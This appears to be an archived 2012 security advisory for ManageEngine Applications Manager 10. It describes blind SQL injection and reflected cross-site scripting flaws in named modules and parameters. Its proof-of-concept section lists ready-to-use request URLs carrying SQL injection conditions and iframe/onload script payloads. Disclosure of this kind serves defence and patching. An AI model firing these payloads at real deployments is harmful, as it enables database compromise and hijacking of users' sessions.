ManageEngine Application Manager 10 Multiple Vulnerabilities

2012-07-19T00:00:00
ID 1337DAY-ID-19086
Type zdt
Reporter n/a
Modified 2012-07-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ME Application Manager 10 - Multiple Web Vulnerabilities

Introduction:
=============
ManageEngine Applications Manager is a server and application performance monitoring software that helps businesses
ensure high availability and performance for their business applications by ensuring servers and applications have
high uptime. The application performance management capability includes server monitoring, application server
monitoring, database monitoring, web services monitoring, virtualization monitoring, cloud monitoring and an array of
other application management capability that will help IT administrators manage their resources effectively.
 
(Copy of the Vendor Homepage: http://www.manageengine.com/products/applications_manager )

Details:
========
1.1
Multiple SQL Injection vulnerabilities  are detected  in Manage Engines Application Manager v10 b10500.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms without user inter action. The vulnerabilities are located in the mypage.do or rca.jsp
module(s) and the bound vulnerable parameters selectedpageid & resourceid. Successful exploitation of the vulnerability
results in dbms & application compromise.
 
Vulnerable Module(s):
            [+] MyPage.do
            [+] RCA.jsp
 
Vulnerable Parameter(s):
            [+] selectedpageid
            [+] resourceid
 
 
1.2
Multiple non persistent cross site scripting vulnerabilities are detected in Manage Engines Application Manager v10 b10500.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high
required user inter action or local low privileged user account. The vulnerabilities are located in the showCustom.do, MyPage.do,
ThresholdActionConfiguration.jsp, showresource.do or ProcessTemplates.do files with the bound vulnreable parameters redirectto, &type,
attributeToSelect, templatetype, forpage & monitorname. Successful exploitation can result in account steal, phishing & client-side
content request manipulation.
 
Vulnerable Module(s):
            [+] showCustom.do
            [+] MyPage.do
            [+] ThresholdActionConfiguration.jsp
            [+] showresource.do
            [+] ProcessTemplates.do
 
Vulnerable Parameter(s):
            [+] redirectto
            [+] &type
            [+] attributeToSelect
            [+] templatetype
            [+] forpage
            [+] monitorname
 
 
Proof of Concept:
=================
1.1
The blind sql injection vulnerabilities can be exploited by remote attackers without user inter action or privileged user account.
For demonstration or reproduce ...
 
PoC:
http://appmanager.127.0.0.1:1338/MyPage.do?method=viewDashBoard&forpage=1&
addNewTab=true&selectedpageid=10000017+AND+1=1--%20-[BLIND SQL-INJECTION]
 
http://appmanager.127.0.0.1:1338/jsp/RCA.jsp?resourceid=10000624&attributeid=1900&alertconfigurl=
%2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D-
10000624'+AND+substring(version(),1)=4[BLIND SQL-INJECTION]
&Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET)
 
 
1.2
The non persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action.
For demonstration or reproduce ...
 
http://appmanager.127.0.0.1:1338/showCustom.do?resourcename=null&type=EC2Instance&original_type=EC2Instance&name=&moname=i-
3a96b773&tabId=1&baseid=10000015&resourceid=10000744&monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&method=showDataforConfs
 
http://appmanager.127.0.0.1:1338/MyPage.do?method=viewDashBoard&forpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL
%22%29%20%3C&addNewTab=true&selectedpageid=10000014
 
http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&
attributeToSelect=101&redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
 
http://appmanager.127.0.0.1:1338/showresource.do?resourceid=10000189&type=%22%3E%3Ciframe%20src=
a%20onload=alert%28%22VL%22%29%20%3C&moname=DNS+monitor&method=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes
 
http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101
&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do
 
http://appmanager.127.0.0.1:1338/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
 
 
Risk:
=====
1.1
The security risk of the blind sql vulnerabilities are estimated as high.
 
1.2
The security risk of the non persistent cross site scripting vulnerabilities are estimated as medium(-).
 


#  0day.today [2018-01-02]  #